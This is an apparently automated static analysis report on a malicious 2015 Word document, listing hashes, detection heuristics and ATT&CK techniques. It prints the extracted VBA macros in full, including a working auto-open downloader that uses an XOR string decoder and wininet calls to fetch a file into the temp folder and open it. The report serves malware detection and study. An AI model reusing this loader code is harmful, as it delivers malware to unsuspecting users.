Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4e07444af5611b7f…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 98.5 KB
Created: 2015-01-19 16:07:00
Authoring application: Microsoft Office Word
First seen: 2015-04-05
MD5: a4104b20e4500bb603454616005775f5
SHA-1: 117dbc656b3bcf1688e0d83c434647a6e4f90d7f
SHA-256: 4e07444af5611b7f895fa1511e7ab4109d5f0041fda494a431d8f3950b4c0c59
Risk Score: 250

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample is a malicious Office document containing obfuscated VBA macros. The 'autoopen' macro and the 'CreateObject' function are used to execute code, which is typical of macro-based malware loaders. The script's primary function appears to be decoding strings and executing a payload, most likely in order to download further malicious content.

Heuristics (8)

  • ClamAV: Doc.Macro.GenericHeuristic-5901772-2 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Macro.GenericHeuristic-5901772-2
  • VBA macros detected [medium, OLE_VBA_MACROS, 4 related findings]
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader [critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script:
    Set FSOOO2 = CreateObject(memak8of(vjf788eS, Mcdsef42))
  • CreateObject call [high, OLE_VBA_CREATEOBJ]
    CreateObject call
    Matched line in script:
    Set FSOOO2 = CreateObject(memak8of(vjf788eS, Mcdsef42))
  • VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low, OLE_VBA_AUTOOPEN]
    AutoOpen macro
    Matched line in script:
    Sub autoopen()
  • Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12427 bytes
SHA-256: c8461b50ba1fe5fe789e8188fd1a26be0dcd3b4d363f429bf94ccca188bb2ba3
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
vsvsvsaaaa110I
End Sub

Attribute VB_Name = "Module4"
Private Sub RIV3333gO()
GoTo wefwefwefweaafewf
wefwefwefweaafewf:
GoTo RERee33EGsssssgvfrgrg
RERee33EGsssssgvfrgrg:
GoTo EN299NEIKISKKKK7
EN299NEIKISKKKK7:
GoTo EN785NEIKISKKKK71
EN785NEIKISKKKK71:
GoTo ENNE435534IKISKKKK72
ENNE435534IKISKKKK72:
GoTo ULLL333LLAKhhwshefg
ULLL333LLAKhhwshefg:

End Sub
Public Function memak8of(acascasc22 As String, ghdhdhe8 As String) As String
    Dim asasas1 As Long
    Dim asasas1O As String
    Dim asasas10 As Integer
    
    Dim efefe332d As Integer
For efefe332d = 0 To 0
If efefe332d = 25 Then End
Next efefe332d
    
    Dim asasas101 As Integer

    For asasas1 = 1 To (Len(ghdhdhe8) / 2)
        asasas10 = Val("&H" & (Mid$(ghdhdhe8, (2 * asasas1) - 1, 2)))
        asasas101 = Asc(Mid$(acascasc22, ((asasas1 Mod Len(acascasc22)) + 1), 1))
        Dim dwww343a As Integer
        For dwww343a = 0 To 0
        If dwww343a = 4 Then End
        Next dwww343a
        asasas1O = asasas1O + Chr(asasas10 Xor asasas101)
         Dim efe33q299 As Integer
        For efe33q299 = 0 To 0
        If efe33q299 = 4 Then End
        Next efe33q299
    Next asasas1
   memak8of = asasas1O
End Function

Private Sub IHYbeffeVuJC()
GoTo asefawf3
asefawf3:
GoTo sgr467gfh
sgr467gfh:
GoTo d45854shfhfshf
d45854shfhfshf:
GoTo rhhrshrsth455
rhhrshrsth455:
GoTo uykoEuxdddd
uykoEuxdddd:
GoTo rVTBqKcccccArFPEEEEEyylmMVi
rVTBqKcccccArFPEEEEEyylmMVi:
GoTo IhzKeee2ascfacas2zw
IhzKeee2ascfacas2zw:
GoTo IhzKeee2svs2333zw
IhzKeee2svs2333zw:
GoTo IhzKeee223334css44zw
IhzKeee223334css44zw:

End Sub

Attribute VB_Name = "Module11"
Private Sub RIVgO()
GoTo myMuLxBcPMGZVtOntBESoqzJEi
myMuLxBcPMGZVtOntBESoqzJEi:
GoTo kDxnSccbgQJQvIHYbeuJCmUQrTZmwRfSEgCBd
kDxnSccbgQJQvIHYbeuJCmUQrTZmwRfSEgCBd:
GoTo NRsSeqnJfEwsDUkFsCaUyAhAG
NRsSeqnJfEwsDUkFsCaUyAhAG:
GoTo jstrwTahLZYosuLbSDlnHk
jstrwTahLZYosuLbSDlnHk:
GoTo zivUUwERtNsQiIuoGpMwG
zivUUwERtNsQiIuoGpMwG:
GoTo UlAHJSqlOQxDQfT
UlAHJSqlOQxDQfT:

End Sub
Private Sub vuykqyOpo()
GoTo NrVTBqKAr
NrVTBqKAr:
GoTo yylmMViKeIhzKzwqIFMQdZlBwyHfL
yylmMViKeIhzKzwqIFMQdZlBwyHfL:
GoTo msLTIokkjoZRZD
msLTIokkjoZRZD:
GoTo gjmeCgKuqfzqguEnn
gjmeCgKuqfzqguEnn:
GoTo oKQlSkVaAolfxuRnL
oKQlSkVaAolfxuRnL:

End Sub
Public Function adrMOYidGVoIc()
GoTo AzEpipThgwzCu
AzEpipThgwzCu:
GoTo bKtvPsx
bKtvPsx:
GoTo qDrdEbaBjAmqQqBvNLi
qDrdEbaBjAmqQqBvNLi:
GoTo UQctH
UQctH:
GoTo bytQYEZemcHQRPUsyF
bytQYEZemcHQRPUsyF:
GoTo wMPSKkyrcJLg
wMPSKkyrcJLg:
GoTo bYGTttUdqRmQpGhHS
bYGTttUdqRmQpGhHS:

End Function
Public Function Nk3Tflh()
GoTo irOJnpV
irOJnpV:
GoTo DsYTTRQIOVn
DsYTTRQIOVn:
GoTo dSVNmPusaOjZPeoQQ
dSVNmPusaOjZPeoQQ:
GoTo luGiChFYjYUOheBl
luGiChFYjYUOheBl:
GoTo xJabwyHfLpFms
xJabwyHfLpFms:
GoTo IokkjoZRZDePgjmeCgK
IokkjoZRZDePgjmeCgK:
GoTo fzqguEnnaM
fzqguEnnaM:

End Function
Private Function QlSkVaAo85668lfxu()

End Function
Public Function Nad121112rMOYidGVoI6c()
GoTo AzEpipThgwzCuibKtvPsxKUqDrdEbaBj
AzEpipThgwzCuibKtvPsxKUqDrdEbaBj:
GoTo qQqBvNLi
qQqBvNLi:
GoTo UQctHQbytQY
UQctHQbytQY:
GoTo GTttUdqRmQpGhHSMfNkT
GTttUdqRmQpGhHSMfNkT:
GoTo hsJZgirO
hsJZgirO:

End Function
Public Function psvssqqqqqqY()
GoTo PoePoePPP
PoePoePPP:
GoTo IokkjoKKLHHnaM
IokkjoKKLHHnaM:
GoTo QlSkVSsSMmnMxuRnLR
QlSkVSsSMmnMxuRnLR:
GoTo ssssscaaaa
ssssscaaaa:
GoTo GAAAAFFFFFc
GAAAAFFFFFc:
GoTo rA09181hgwzCuS
rA09181hgwzCuS:
GoTo KtvPs
KtvPs:

End Function
Private Function UqD34343434rdEbaBjAm()

End Function
Private Function vNLigbrgrgRH8856H()

End Function
Public Sub tQY34cHQ()

End Sub
Public Function y5000S()
GoTo cJLg6666sssssNbYGT
cJLg6666sssssNbYGT:
GoTo UdS334y5y5pGhHS
UdS334y5y5pGhHS:
GoTo NkTflaaAAa5555JZgirOJnpV
NkTflaaAAa5555JZgirOJnpV:

End Function
Public Function DsYTTRQIO()

End Function
Public Function vssvsef3wtg3gxfvx()
GoTo sdssssaas
sdssssaas:
GoTo sdvsS54738EG
sdvsS54738EG:
GoTo oZRZD44444eP
oZRZD44444eP:
GoTo meCvvvvvvgKuqf
meCvvvvvvgKuqf:

End Function





Attribute VB_Name = "Module3"
Option Explicit

#If VBA7 And Win64 Then
Private Declare PtrSafe Function figal1221 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
Private Declare PtrSafe Function lastSm23 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
Private Declare PtrSafe Function feefeROZ Lib "wininet.dll" Alias "InternetReadFile" (ByVal hFile As LongPtr, ByVal sBuff As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Private Declare PtrSafe Function hlopa3r3 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
#Else
Private Declare Function figal1221 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
Private Declare Function lastSm23 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
Private Declare Function feefeROZ Lib "wininet.dll" Alias "InternetReadFile" (ByVal hFile As Long, ByVal sBuff As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Private Declare Function hlopa3r3 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
#End If

Private Const MBL = 8162
Private Const AAN As String = "Mod2"
Private Const IOTD = 1
Private Const IFNCW = &H4000000
Public Function LopapunTIK1(ByVal sURL As String, ByVal sFileName As String) As Boolean
    #If VBA7 And Win64 Then
        Dim hOpen As LongPtr, hFile As LongPtr
    #Else
        Dim hOpen As Long, hFile As Long
    #End If
    Dim Ret As Long
    Dim sBuff As String * MBL, sData As String
    Dim iFile As Integer, dData As Double
    hOpen = lastSm23(AAN, IOTD, vbNullString, vbNullString, 0)
    If hOpen = 0 Then
        Exit Function
    End If
    hFile = hlopa3r3(hOpen, sURL, vbNullString, 0, IFNCW, 0)
    If hFile = 0 Then
        dData = 0
    Else
        feefeROZ hFile, sBuff, MBL, Ret
        sData = sBuff
        Do While Ret <> 0
            feefeROZ hFile, sBuff, MBL, Ret
            sData = sData + Mid(sBuff, 1, Ret)
        Loop
        dData = Len(sData): iFile = FreeFile
        Open sFileName For Binary Access Write Lock Write As #iFile
        Put #iFile, , sData: Close #iFile
    End If
    figal1221 hFile
    figal1221 hOpen
    sData = ""
    If dData Then
        LopapunTIK1 = True
    End If
End Function

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{0E025501-84C6-41E7-9746-1CA55D1B1958}{77F0D86A-FD6B-4DF8-8CBF-DEC50BAAAD80}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module1"

Attribute VB_Name = "Module2"
Private Const GRxvSG = "300C061F0F5D2717061F0C1503370A0B0D"
Private Const jryj = "3F1E02180A1F090A4E454B131A26"
Private Const sdioph34 = "0B101703595C49171B1E040409374D00065C090049051F1D4B131A26"
Private Const Mcdsef42 = "3007111A13070F09115D231F0E26301D1007061E29051C160602"
Private Const vjf788eS = "Ccdcscsfgvsevb"






Sub vsvsvsaaaa110I()
Dim FSOOO2
Dim sder53dfbhRF As Integer
For sder53dfbhRF = 0 To 0
If sder53dfbhRF = 5 Then End
Next sder53dfbhRF
Set FSOOO2 = CreateObject(memak8of(vjf788eS, Mcdsef42))
Dim fffffF
Const fffffFID = 2
Dim DdDd22A As Integer
For DdDd22A = 0 To 0
If DdDd22A = 5 Then End
Next DdDd22A
Set fffffF = FSOOO2.GetSpecialFolder(fffffFID)
Dim Ee11 As Integer
For Ee11 = 0 To 0
If Ee11 = 5 Then End
Next Ee11
EdEdE111 = fffffF & memak8of(vjf788eS, jryj)
Dim sil3489df As Integer
For sil3489df = 0 To 0
If sil3489df = 5 Then End
Next sil3489df
Set FSObject2 = CreateObject(memak8of(vjf788eS, Mcdsef42))
Dim seswwwsa As Integer
For seswwwsa = 0 To 0
If seswwwsa = 5 Then End
Next seswwwsa
If FSObject2.FileExists(EdEdE111) Then
FSObject2.DeleteFile EdEdE111
End If
If LopapunTIK1(memak8of(vjf788eS, sdioph34), EdEdE111) Then
End If
Set SSSS = Nothing
If FSObject2.FileExists(EdEdE111) Then
End If
Set SASASA = CreateObject(memak8of(vjf788eS, GRxvSG))
SASASA.Open EdEdE111
End Sub







Attribute VB_Name = "Module5"

Public Sub PkD4040Sccbg()

End Sub
Private Sub IHYbe505VuJC()
GoTo TZmwR230fSEgCdKcNRsSeYqnJf
TZmwR230fSEgCdKcNRsSeYqnJf:
GoTo sDUk444FsCaUyA
sDUk444FsCaUyA:
GoTo GODjstrwT6904lnHkpCzivUUw
GODjstrwT6904lnHkpCzivUUw:
GoTo tNsQiIjuoGp873Tz
tNsQiIjuoGp873Tz:
GoTo uykqyO888855poEux
uykqyO888855poEux:
GoTo rVTBqKAr357FPyylmMVi
rVTBqKAr357FPyylmMVi:
GoTo IhzK4444zw
IhzK4444zw:
GoTo FdMQdZlB0258CYajGoQNTnvkPL
FdMQdZlB0258CYajGoQNTnvkPL:
GoTo PAtAfFrPpPpHKNFeHmVR
PAtAfFrPpPpHKNFeHmVR:

End Sub
Private Sub RIV1541414gO()
GoTo myMuLsaaaESoqzJEi
myMuLsaaaESoqzJEi:
GoTo kDxnScceeeeeCmUQrTZmwRfSEgCBd
kDxnScceeeeeCmUQrTZmwRfSEgCBd:
GoTo NRsSeqnaaaaaJfEwsDUkFsCaUyAhAG
NRsSeqnaaaaaJfEwsDUkFsCaUyAhAG:
GoTo jstrwT2352525ahLZYosuLbSDlnHk
jstrwT2352525ahLZYosuLbSDlnHk:
GoTo zivUUw44oGpMwG
zivUUw44oGpMwG:
GoTo UlAHJS444444qlOQxDQfT
UlAHJS444444qlOQxDQfT:

End Sub
Private Sub vuyk111111qyOpo()
GoTo NrV1010TBqKAr
NrV1010TBqKAr:
GoTo yylmMVi6464KeIhzKzwqIFMQdZlBwyHfL
yylmMVi6464KeIhzKzwqIFMQdZlBwyHfL:
GoTo msLTIok444kjoZRZD
msLTIok444kjoZRZD:
GoTo gjmeCgKu555qfzqguEnn
gjmeCgKu555qfzqguEnn:
GoTo oKQlSkVaA768olfxuRnL
oKQlSkVaA768olfxuRnL:

End Sub
Public Function adrMOY7777idGVoIc()
GoTo AzEpipThgwsdve4zCu
AzEpipThgwsdve4zCu:
GoTo bKtv4444Psx
bKtv4444Psx:
GoTo qDrdEbaBj534745674AmqQqBvNLi
qDrdEbaBj534745674AmqQqBvNLi:
GoTo UQct874H
UQct874H:
GoTo bytQYE0990099ZemcHQRPUsyF
bytQYE0990099ZemcHQRPUsyF:
GoTo wMPSKk333yrcJLg
wMPSKk333yrcJLg:
GoTo bYG23232TttUdqRmQpGhHS
bYG23232TttUdqRmQpGhHS:

End Function
Public Function Nk3121212Tflh()
GoTo irO5789JnpV
irO5789JnpV:
GoTo DsYTTR3333QIOVn
DsYTTR3333QIOVn:
GoTo dSVNmPusa565656OjZPeoQQ
dSVNmPusa565656OjZPeoQQ:
GoTo luGiChFYjYUO99999heBl
luGiChFYjYUO99999heBl:
GoTo xJabwyHfLpF66666ms
xJabwyHfLpF66666ms:
GoTo Io44kkjoZRZDePgj54meCgK
Io44kkjoZRZDePgj54meCgK:
GoTo fz343333222MMMaM
fz343333222MMMaM:

End Function
Private Function QlSkGhHHGgglfxu()

End Function
Public Function psvssEEEqqqqqqY()
GoTo PoeP001199PPP
PoeP001199PPP:
GoTo OPDK333339ja
OPDK333339ja:
GoTo JabwyU444444IOTYhFms
JabwyU444444IOTYhFms:
GoTo IokkjoKKLHH55555naM
IokkjoKKLHH55555naM:
GoTo QlSkVSsSM66666mnMxuRnLR
QlSkVSsSM66666mnMxuRnLR:
GoTo s77777sssscaaaa
s77777sssscaaaa:
GoTo GAAAAFFFFFc
GAAAAFFFFFc:
GoTo rA09181hg88888wzCuS
rA09181hg88888wzCuS:
GoTo KtvP999999s
KtvP999999s:

End Function
Private Function UqD34343000000dEbaBjAm()

End Function
Private Function vNLigbrg1010108856H()

End Function
Public Sub tQY34212121cHQ()

End Sub
Public Function y5012121200S()
GoTo cJLg666wewEEENbYGT
cJLg666wewEEENbYGT:
GoTo UdSWRRrrRRTT5y5pGhHS
UdSWRRrrRRTT5y5pGhHS:
GoTo NkTflaaAAaYyYyYyJnpV
NkTflaaAAaYyYyYyJnpV:

End Function
Public Function DsYT3332222TRQIO()

End Function
Public Function vssvs234567gxfvx()
GoTo sdsssNnNnsaas
sdsssNnNnsaas:
GoTo sdvsS5KkKk4738EG
sdvsS5KkKk4738EG:
GoTo oZRZD44UuUuUu444eP
oZRZD44UuUuUu444eP:
GoTo meCvvvvvvgKuqf
meCvvvvvvgKuqf:

End Function